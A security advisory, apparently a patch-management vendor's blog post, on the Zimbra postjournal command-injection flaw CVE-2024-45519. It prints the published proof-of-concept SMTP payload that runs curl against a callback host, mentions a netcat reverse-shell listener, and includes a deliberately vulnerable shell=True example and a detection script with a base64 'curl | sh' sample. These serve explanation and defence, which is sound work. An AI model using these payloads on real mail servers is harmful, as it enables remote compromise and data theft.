Zimbra Fixes Actively Exploited CVE-2024-45519 Flaw Allowing Unauthorised Code Execution

Zimbra has issued an advisory for a critical vulnerability, CVE-2024-45519, in the postjournal service of Zimbra Collaboration. The flaw allows unauthenticated attackers to execute arbitrary commands on vulnerable servers. ProjectDiscovery published a technical analysis and a proof-of-concept (PoC) exploit, and in-the-wild exploitation was observed shortly after the PoC became public.

An effective patch management tool closes such gaps before they are exploited and keeps your IT secure.

The Nature of the Vulnerability

CVE-2024-45519 is a Remote Code Execution (RCE) vulnerability in the postjournal service of Zimbra Collaboration (ZCS), the component that journals (archives copies of) mail passing through the server. The bug is in the read_maps function, where user-controlled input is built into a command string and passed to popen without sanitization. popen hands that string to /bin/sh, so any shell syntax contained in the input is interpreted and executed rather than treated as data.

Technical Breakdown

Input Sanitization Failure: User-supplied data, such as email addresses and other SMTP fields, is incorporated directly into command strings without sufficient sanitization. An attacker can therefore craft input that changes which commands the server executes.

Command Injection via SMTP: Attackers exploit the flaw by sending an SMTP message whose address fields contain shell syntax. For example, the command can be embedded in a quoted local part of the recipient address:

RCPT TO:<"aabbb$(curl${IFS}oast.me)"@mail.domain.com>

Here $(...) is shell command substitution, and ${IFS} expands to the shell's internal field separator (whitespace). It stands in for the space between curl and its argument, so the address stays a single token without literal spaces. When this local part reaches popen unsanitized, the shell runs curl against the attacker's callback host.

Execution Context: When the postjournal service processes such a message, the embedded command runs as if it were part of the intended command line. This can lead to full server compromise: attackers can drop web shells or run further commands under the account the postjournal service runs as.
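The pattern behind the flaw, shown as an added example that is not Zimbra's code: postjournal is written in C and reaches popen(), which passes its string to /bin/sh; the Python stand-in below mirrors that with subprocess and shell=True, using echo as a hypothetical downstream tool, and places it beside the hardened form that passes the address as a single argv element with no shell, plus a strict allowlist check. The recipient strings are constructed to match the shape of the published PoC, with echo${IFS}INJECTED replacing the curl callback so the example runs offline.

```python
import re
import subprocess

# Hypothetical stand-in for whatever program the journaling hook hands an
# envelope address to. The real postjournal is C and uses popen(); the
# shell=True call below is the same pattern (string -> /bin/sh -c).
TOOL = "echo"

# Constructed sample inputs: a normal recipient, and the shape of the PoC
# payload with a harmless command (${IFS} is the shell's field separator,
# used as a space substitute so the address stays one token).
BENIGN_RCPT = "alice@mail.domain.com"
PAYLOAD_RCPT = '"aabbb$(echo${IFS}INJECTED)"@mail.domain.com'


def run_vulnerable(rcpt: str) -> str:
    """Builds a command string from the address and runs it via /bin/sh.
    This is the popen()-style mistake: anything the shell understands inside
    rcpt is evaluated instead of being passed through as data."""
    cmd = f"{TOOL} {rcpt}"
    out = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return out.stdout.rstrip("\n")


def run_hardened(rcpt: str) -> str:
    """Passes the address as one argv element. No shell is involved, so
    $(...) and ${IFS} reach the child program as literal bytes."""
    out = subprocess.run([TOOL, rcpt], capture_output=True, text=True)
    return out.stdout.rstrip("\n")


# Defence-in-depth allowlist (an assumption for this example). Deliberately
# narrower than RFC 5321, which permits quoted local parts: an envelope
# address that needs shell metacharacters is not one a journaling hook
# should ever forward to a subprocess.
ADDRESS_RE = re.compile(r"^[A-Za-z0-9._%+-]{1,64}@[A-Za-z0-9.-]+\.[A-Za-z]{2,}$")


def address_is_safe(rcpt: str) -> bool:
    """True only for addresses made of plain local-part and domain characters."""
    return ADDRESS_RE.fullmatch(rcpt) is not None


if __name__ == "__main__":
    print("vulnerable:", run_vulnerable(PAYLOAD_RCPT))   # INJECTED appears in the output
    print("hardened:  ", run_hardened(PAYLOAD_RCPT))     # payload echoed back literally
    print("allowlist rejects payload:", not address_is_safe(PAYLOAD_RCPT))
```

The real fix is the second function: never build a shell command line from untrusted input, and call the helper with an argument vector instead. The allowlist is an extra layer, not a substitute; a blocklist of individual metacharacters would miss encodings such as ${IFS} that the PoC already relies on.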

Lateral Movement and Data Exfiltration: Once an attacker gains control over a vulnerable Zimbra server, they can leverage this access to steal sensitive data, install persistent backdoors, or move laterally within the network to target other systems.

Public Exploit Availability: Following ProjectDiscovery's disclosure, a PoC exploit script was released on GitHub. The script automates the attack against a vulnerable SMTP service and establishes a reverse shell back to the attacker's machine. In the published workflow the attacker first runs nc -lvnp 4444 to listen on port 4444 for the connection from the compromised server, then sends the crafted SMTP message.

Indicators of Compromise

Administrators should monitor for several indicators that may suggest exploitation attempts:
  • Unusual entries in the Zimbra logs under /opt/zimbra/log/, particularly around email processing.
  • Base64-encoded strings in email headers that may carry an injected command.
  • Unauthorized changes to, or web shells appearing in, server directories.
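The indicators above, turned into a check that can be run over SMTP transaction log lines or raw message headers. This is an added example, not part of Zimbra or of the original post; the patterns and thresholds are assumptions for illustration, and the sample lines are constructed: one mirrors the PoC's RCPT TO shape, one carries a base64-encoded command inside a CC header, and the rest are benign traffic that should not be flagged.

```python
import base64
import re

# Shell constructs worth flagging in an SMTP field: command substitution,
# backticks, the ${IFS} space substitute, and a pipe into an interpreter.
SHELL_META_RE = re.compile(r"\$\(|`|\$\{IFS\}|\|\s*(?:sh|bash|base64)\b")
# A quoted local part is legal SMTP, but one carrying shell syntax is not
# something a real sender produces.
QUOTED_LOCAL_RE = re.compile(r'"([^"]*)"@')
# Candidate base64 runs long enough to hold a command (threshold is an assumption).
B64_RE = re.compile(r"(?<![A-Za-z0-9+/])[A-Za-z0-9+/]{16,}={0,2}(?![A-Za-z0-9+/])")
# What we expect to see once an injected payload is decoded.
DECODED_SUSPECT_RE = re.compile(r"\b(curl|wget|sh|bash|nc|python|perl)\b|\$\(|\|")


def decode_b64_if_shelly(token: str):
    """Return the decoded text if it looks like a command, else None."""
    try:
        raw = base64.b64decode(token + "=" * (-len(token) % 4), validate=True)
        text = raw.decode("ascii")
    except (ValueError, UnicodeDecodeError):
        return None
    return text if DECODED_SUSPECT_RE.search(text) else None


def scan_line(line: str) -> list:
    """Return the list of reasons a line is suspicious (empty if clean)."""
    reasons = []
    if SHELL_META_RE.search(line):
        reasons.append("shell metacharacters in SMTP field")
    for m in QUOTED_LOCAL_RE.finditer(line):
        if re.search(r"[$`|;()]", m.group(1)):
            reasons.append("quoted local part contains shell syntax")
            break
    for m in B64_RE.finditer(line):
        decoded = decode_b64_if_shelly(m.group(0))
        if decoded:
            reasons.append(f"base64 decodes to command-like text: {decoded!r}")
    return reasons


def scan(lines):
    """Return (index, line, reasons) for every flagged line."""
    hits = []
    for i, line in enumerate(lines):
        reasons = scan_line(line)
        if reasons:
            hits.append((i, line, reasons))
    return hits


# Constructed sample lines (not real Zimbra log output).
B64_CMD = base64.b64encode(b"curl http://oast.me/x").decode()
SAMPLE_LINES = [
    'RCPT TO:<"aabbb$(curl${IFS}oast.me)"@mail.domain.com>',
    f'CC: "aabbb$(echo${{IFS}}{B64_CMD}|base64${{IFS}}-d|sh)"@mail.domain.com',
    "RCPT TO:<alice@mail.domain.com>",
    "Subject: Q3 report",
    f"X-Tracking-Id: {base64.b64encode(b'ticket-48213-archive').decode()}",
]

if __name__ == "__main__":
    for idx, line, reasons in scan(SAMPLE_LINES):
        print(f"line {idx}: {line}")
        for r in reasons:
            print(f"    - {r}")
```

The base64 check decodes every plausible run and only reports ones whose plaintext looks like a command, so ordinary encoded identifiers (the tracking header above) stay quiet. Tune the interpreter list and the length threshold to your own traffic before relying on it for alerting.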

Affected Versions and Remediation

Version                Affected releases                 Fixed in
Zimbra 8.8.15          Patch 45 and earlier              8.8.15 Patch 46
Zimbra 9.0.0           Patch 40 and earlier              9.0.0 Patch 41
Zimbra 10.0.x          Releases before 10.0.9            10.0.9
Zimbra 10.1.x          Releases before 10.1.1            10.1.1

The vulnerability was reported by security researcher Alan Li (lebr0nli), and Zimbra shipped the fixed releases listed above in early September 2024.

Updated Advisory: Exploited in the Wild

At the time of the original advisory there were no known instances of exploitation; subsequent reports indicate that CVE-2024-45519 has been actively targeted since September 28, 2024. The attacks deliver crafted emails that trigger command execution on unpatched servers, and researchers have observed base64-encoded payloads in message headers that are decoded and executed once the injection fires.

Action Required

Given the critical nature of CVE-2024-45519 and its active exploitation, organizations running affected versions of Zimbra are strongly advised to upgrade immediately. SanerNow detects this vulnerability. Where patching cannot be done promptly, disable the postjournal service as a temporary mitigation until the update can be applied; the flaw is only reachable when that service is running.

Instantly Fix Risks with SanerNow Patch Management

SanerNow patch management is a continuous, automated, and integrated software that instantly fixes risks exploited in the wild. The software supports major operating systems like Windows, Linux, and macOS, as well as 550+ third-party applications.

It also allows you to set up a safe testing area to test patches before deploying them in a primary production environment. SanerNow patch management additionally supports a patch rollback feature in case of patch failure or a system malfunction.

Experience the fastest and most accurate patching software here.